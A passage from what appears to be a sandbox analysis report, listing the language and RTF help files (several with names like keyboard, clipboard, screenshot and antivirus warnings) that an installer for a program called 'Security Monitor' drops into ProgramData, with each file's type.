C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\french\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-1HIS4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-28PUJ.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-29KG2.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-2HD8H.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-61I78.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-7E8CV.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-AQSP1.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-ARQFI.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-C988M.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-D6AKK.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-ECS17.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-L862D.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-LON1O.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-PBOMM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-SKB5J.tmp
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-TURVD.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\is-UJ33M.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1252, default middle east language ID 2145
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\german\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-0HUUT.tmp
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-2U17P.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-3ODUV.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-5TKF1.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-8J1BH.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-EGR32.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-FKAG8.tmp
ASCII text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-H5H85.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-N4H6P.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-OMJG1.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-P4G6I.tmp
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\is-VUEPE.tmp
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-1JL71.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-ADDU5.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-AIGDA.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-ER06U.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-GH4HM.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-HPQVI.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-IA3F6.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-IBM2M.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-K4J90.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-M21VG.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-M4MPQ.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-PJHLS.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-RUHIK.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-SP2VU.tmp
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-TJ0TB.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-UILOA.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\is-VPREH.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\video.rtf (copy)
Rich Text Format data, version 1, ANSI, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\italian\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\japan.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\korean.lng (copy)
Unicode text, UTF-8 text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-0C85I.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-2C3CC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-4BPAO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-5P9PC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-8VMSL.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-BF7L0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-GTTGK.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-GUCRO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-IIL8T.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-JVC6B.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-KKP9M.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-LL2U7.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-NIQOO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-O1KT5.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-O79GJ.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-P6UCM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\is-SDKPM.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\keyboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\logging.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noPRO.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\noURL.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\scheduler.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\screenshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\settings.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\siteblock.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\snapshot.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\sound.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\video.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\portuguese\websites.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian.lng (copy)
Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\McAfee_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\SN.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\activity.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\alarms.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\clipboard.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\delivery.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\eset_warning.rtf (copy)
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-15V5O.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-1HMU0.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-1NEEC.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-2P21T.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-5U0M3.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-D67PO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-FD9G4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-GHOD4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-HPV3G.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-IITLO.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-IOPDE.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-IS96C.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-MCGCD.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-MUJ9G.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-N4EIP.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-NJI8P.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-P3CN5.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-S9P3L.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
C:\ProgramData\Security Monitor\{827D21CC-A22D-45D6-23CA-451DDAC769BA}\lng\russian\is-SDGI4.tmp
Rich Text Format data, version 1, ANSI, code page 1251, default middle east language ID 1025
dropped
